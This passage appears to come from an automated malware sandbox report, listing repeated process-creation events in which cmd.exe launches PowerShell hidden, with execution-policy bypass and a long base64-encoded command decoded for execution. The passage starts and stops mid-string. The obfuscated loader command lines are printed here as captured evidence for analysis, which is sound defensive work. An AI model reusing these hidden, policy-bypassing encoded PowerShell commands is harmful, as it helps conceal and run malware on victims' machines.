jux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsj